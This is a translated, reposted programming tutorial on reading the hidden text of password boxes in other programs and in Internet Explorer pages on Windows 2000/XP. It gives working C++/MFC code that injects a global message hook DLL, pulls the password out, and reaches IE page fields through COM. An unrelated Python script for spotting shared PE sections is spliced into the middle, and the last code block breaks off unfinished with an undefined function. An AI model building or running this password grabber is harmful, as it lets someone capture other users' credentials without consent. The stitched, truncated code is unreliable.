Look at Win2000, WinXP, **********

zhaozj, 2021-02-16

This article explains how to write a program that reads the password in a password box on Win2000 and WinXP, including the password box on a web page.

Previously, an application could easily obtain a password by sending a WM_GETTEXT message to a password box. Microsoft may have recognized this weakness: on Win2000/XP, an application written that way fails when it sends WM_GETTEXT to the password box of another program. The reason is that, across processes, the call fails if the window handle parameter does not belong to the process of the calling thread.

To solve this problem we can use a hook function, which generally lives in a dynamic-link library. Win32 automatically maps the DLL into each hooked process, and the other functions of the DLL are mapped into that process along with it, so the hook function runs inside its host program, together with the host's windows. Because the DLL is mapped into that process, the window handle hWnd passed to the function belongs to the same process, which Win32 allows. So we write a DLL, inject it into the process that owns the password box, read the password there, and use WM_COPYDATA for inter-process communication to send the password to the program that displays it.

After the theory, I started to build the program with VC. First create a dialog-based program GetPass, leaving the other options at their defaults. Add an Edit control with the ID IDC_EDIT1 to display the password that is obtained. Add:

    const CWnd *pWndInsertAfter;
    pWndInsertAfter = &wndTopMost;
    SetWindowPos(pWndInsertAfter, 0, 0, 0, 0, SWP_NOSIZE);  // Place the window on top
    SetTimer(1, 100, NULL);               // Get a password every 100 milliseconds
    BOOL k = InitHook(this->m_hWnd);      // Install the hook
    if (k == FALSE)
        AfxMessageBox("false");

Override the OnTimer function and add the following code:

    HWND hWnd;
    CPoint mousePos;
    GetCursorPos(&mousePos);              // Get the current mouse coordinates
    hWnd = ::WindowFromPoint(mousePos);   // Get the handle of the window at those coordinates
    GetPassText(hWnd, m_hWnd);            // Call this function to get the password

Start ClassWizard and add a handler for the WM_COPYDATA message. In the added function OnCopyData(CWnd *pWnd, COPYDATASTRUCT *pCopyDataStruct), add the following code to receive the password sent from the DLL:

    SetDlgItemText(IDC_EDIT1, (LPCTSTR)pCopyDataStruct->lpData);

Compiling the program at this point produces two errors:

    error C2065: 'InitHook' : undeclared identifier
    error C2065: 'GetPassText' : undeclared identifier

These two functions are the ones we are going to build in the DLL. So we create a new project, select MFC AppWizard (dll), and select Add to current workspace, leaving the other options at their defaults. First add the variables and macro definitions to Password.cpp:

    #define MAX_TEXTLEN 1024
    #define UM_GETPASS  (WM_USER + 0x392)
    HINSTANCE ghInstance = 0;
    #pragma data_seg("ALLDATA")
    HHOOK     g_hHook    = NULL;
    HINSTANCE g_hDllIns  = NULL;
    HWND      g_hHostWnd = NULL;
    #pragma data_seg()

Then rewrite Password.def as follows:

    LIBRARY      "Password"
    DESCRIPTION  'Password Windows Dynamic Link Library'
    EXPORTS
        InitHook     @1
        ReleaseHook  @2
        GetPassText  @3
    SECTIONS
        ALLDATA  SHARED
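The SHARED attribute on the ALLDATA section is recorded by the linker in the DLL's PE section header as IMAGE_SCN_MEM_SHARED, which makes a hook DLL built this way recognizable on disk. The following is an added example, not part of the original article: a triage check that parses a PE section table and reports sections that are both shared and writable, using a header-only sample image constructed inline (the function names are illustrative).

```python
import struct

IMAGE_SCN_MEM_SHARED = 0x10000000  # section is shared across processes
IMAGE_SCN_MEM_WRITE = 0x80000000   # section is writable


def shared_writable_sections(image: bytes) -> list:
    """Return the names of PE sections flagged both SHARED and WRITE."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    if e_lfanew + 24 > len(image):
        raise ValueError("truncated COFF header")
    # COFF header follows the signature: NumberOfSections at +6,
    # SizeOfOptionalHeader at +20; the section table follows the optional header.
    (nsections,) = struct.unpack_from("<H", image, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    hits = []
    for i in range(nsections):
        off = table + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(image):
            raise ValueError("truncated section table")
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        (flags,) = struct.unpack_from("<I", image, off + 36)  # Characteristics
        if flags & IMAGE_SCN_MEM_SHARED and flags & IMAGE_SCN_MEM_WRITE:
            hits.append(name)
    return hits


def constructed_image(sections) -> bytes:
    """Build a header-only PE image for the demo (constructed sample, no code)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x2000)
    table = b"".join(struct.pack("<8s6I2HI", n, 0, 0, 0, 0, 0, 0, 0, 0, f)
                     for n, f in sections)
    return dos + b"PE\0\0" + coff + table


# Constructed sample: code, ordinary data, and a section declared SHARED.
SAMPLE = constructed_image([
    (b".text", 0x60000020),
    (b".data", 0xC0000040),
    (b"ALLDATA", 0xD0000040),
])

if __name__ == "__main__":
    print(shared_writable_sections(SAMPLE))
```

A shared writable section is uncommon in ordinary DLLs, so a hit is a reason to examine what the module hooks rather than proof of malice.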

We add the function declarations by hand. Then add the following to CPasswordApp::InitInstance():

    g_hDllIns = AfxGetInstanceHandle();
    DisableThreadLibraryCalls(g_hDllIns);

Then add the following code after the global variable CPasswordApp theApp in Password.cpp:

    LRESULT CALLBACK GetMsgProc(int code, WPARAM wParam, LPARAM lParam)
    {
        try {
            if (code >= 0) {
                LPMSG pMsg = (LPMSG)lParam;
                HWND hShowPassWnd = (HWND)pMsg->lParam;
                if (pMsg->message == UM_GETPASS && g_hHostWnd == hShowPassWnd) {
                    // Get the content behind the *
                    HWND hPassWnd = (HWND)pMsg->wParam;  // HWND of the * window
                    if (hPassWnd) {
                        TCHAR szPassText[MAX_TEXTLEN];
                        ZeroMemory(szPassText, MAX_TEXTLEN);
                        ::SendMessage(hPassWnd, WM_GETTEXT, MAX_TEXTLEN, (LPARAM)szPassText);  // Get the content
                        COPYDATASTRUCT cd;
                        ZeroMemory(&cd, sizeof(cd));
                        cd.dwData = (DWORD)hPassWnd;
                        cd.cbData = strlen(szPassText) + 1;
                        cd.lpData = szPassText;
                        SendMessage(hShowPassWnd, WM_COPYDATA, (WPARAM)hPassWnd, (LPARAM)&cd);  // Send to the ShowPass window
                    }
                }
            }
        } catch (...) {
        }
        return CallNextHookEx(g_hHook, code, wParam, lParam);
    }

    BOOL InitHook(HWND hWnd)
    {
        try {
            if (g_hHook != NULL)
                return FALSE;
            g_hHostWnd = hWnd;
            g_hHook = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hDllIns, 0);
            return g_hHook != NULL;
        } catch (...) {
            return FALSE;
        }
    }

    HWND WINAPI GetParentFromHwnd(HWND hWnd)
    {
        HWND hParWnd;
        try {
            do {
                hParWnd = GetParent(hWnd);
                if (hParWnd) {
                    hWnd = hParWnd;
                }
            } while (hParWnd);
        } catch (...) {
        }
        return hWnd;
    }

    void GetPassText(HWND hWndPass, HWND hWndShowPass)
    {
        try {
            HWND hParWnd = GetParentFromHwnd(hWndPass);
            ::PostMessage(hParWnd, UM_GETPASS, (WPARAM)hWndPass, (LPARAM)hWndShowPass);
        } catch (...) {
        }
    }

    // Uninstall the hook
    BOOL ReleaseHook()
    {
        BOOL bSuccess = FALSE;
        try {
            if (g_hHook != NULL) {
                bSuccess = UnhookWindowsHookEx(g_hHook) ? TRUE : FALSE;
                g_hHook = NULL;
                g_hHostWnd = NULL;
            }
        } catch (...) {
        }
        return bSuccess;
    }

Add the export declarations for the functions to Password.h:

    extern "C" _declspec(dllexport) void GetPassText(HWND hWndPass, HWND hWndShowPass);
    extern "C" _declspec(dllexport) BOOL InitHook(HWND hWnd);
    extern "C" _declspec(dllexport) BOOL ReleaseHook();

Finally compile and link, copy the generated Password.dll and Password.lib to the directory of the GetPass project, and add the following code at the top of GetPassDlg.cpp in the GetPass project:

    #pragma comment(lib, "Password.lib")  // implicit link
    extern "C" _declspec(dllexport) void GetPassText(HWND hWndPass, HWND hWndShowPass);
    extern "C" _declspec(dllexport) BOOL InitHook(HWND hWnd);
    extern "C" _declspec(dllexport) BOOL ReleaseHook();

Now run the program, and you can see the password of the password box that the mouse points to in an application. But when we point the mouse at a password box on a web page, we cannot get its content, because a web page password box is not an ordinary EDIT control, so we cannot get a handle for it. To implement this feature, we have to go through the COM interfaces of the WebBrowser control, so obtaining these interfaces is the key to the whole program.

The IHTMLDocument2 interface of a WebBrowser control in a different process can be obtained as follows: send a WM_HTML_GETOBJECT message to the WebBrowser control (window class name "Internet Explorer_Server"), then pass the return value to the Microsoft Active Accessibility (MSAA) function ObjectFromLresult, which gives you a COM interface that has been marshaled across the process boundary. The function is shown below:

    IHTMLDocument2 *GetDocInterface(HWND hWnd)
    {
        // We load oleacc.dll explicitly, so that we know whether MSAA is installed
        HINSTANCE hInst = ::LoadLibrary(_T("OLEACC.DLL"));
        IHTMLDocument2 *pDoc2 = NULL;
        if (hInst != NULL) {
            if (hWnd != NULL) {
                CComPtr<IHTMLDocument> spDoc = NULL;
                LRESULT lRes;
                /* WM_HTML_GETOBJECT is not a standard Windows message, so RegisterWindowMessage is needed */
                UINT nMsg = ::RegisterWindowMessage(_T("WM_HTML_GETOBJECT"));
                ::SendMessageTimeout(hWnd, nMsg, 0L, 0L, SMTO_ABORTIFHUNG, 1000, (DWORD *)&lRes);

                /* Get the address of the ObjectFromLresult function */
                LPFNOBJECTFROMLRESULT pfObjectFromLresult =
                    (LPFNOBJECTFROMLRESULT)::GetProcAddress(hInst, _T("ObjectFromLresult"));
                if (pfObjectFromLresult != NULL) {
                    HRESULT hr;
                    hr = pfObjectFromLresult(lRes, IID_IHTMLDocument, 0, (void **)&spDoc);
                    if (SUCCEEDED(hr)) {
                        CComPtr<IDispatch> spDisp;
                        CComQIPtr<IHTMLWindow2> spWin;
                        spDoc->get_Script(&spDisp);
                        spWin = spDisp;
                        spWin->get_document(&pDoc2);
                    }
                }
            }
            ::FreeLibrary(hInst);
        } else {
            // MSAA is not installed
            AfxMessageBox(_T("Please install Microsoft Active Accessibility"));
        }
        return pDoc2;
    }

Please note: if the program runs on Windows 95, 98, or NT 4.0 with Service Pack 4 or 5, the Microsoft Active Accessibility (MSAA) Runtime Components (RDK) must be distributed with the program (Windows 2000 and Windows NT 4.0 with Service Pack 6 already include them, so this is not needed there).

CoInitialize(NULL) must be called before using this method, and CoUninitialize() must be called afterwards. So add CoInitialize(NULL); in CGetPassDlg::OnInitDialog(), then handle the WM_DESTROY message and add the following code to its handler function void CGetPassDlg::OnDestroy():

    CoUninitialize();  // Uninitialize COM
    KillTimer(1);      // Stop the timer

In this way, we have obtained the IHTMLDocument2 * interface. To get the password of the password box, we still have more work to do. Now rewrite the void CGetPassDlg::OnTimer(UINT nIDEvent) function from earlier as follows:

    HWND hWnd;
    CPoint mousePos;
    GetCursorPos(&mousePos);              // Get the current mouse coordinates
    static TCHAR buf[100];
    hWnd = ::WindowFromPoint(mousePos);   // Get the handle of the window at those coordinates
    if (hWnd != NULL) {
        ::GetClassName(hWnd, (LPTSTR)&buf, 100);
        if (_tcscmp(buf, _T("Internet Explorer_Server")) == 0) {  // If it is IE, use the other method
            POINT iePt = mousePos;
            ::ScreenToClient(hWnd, &iePt);
            GetPassword(GetDocInterface(hWnd),
        } else  // If it is another window, use the original method to get the password
            GetPassText(hWnd, m_hWnd);
    }

When reposting, please credit the original address: https://www.9cbs.com/read-12068.html
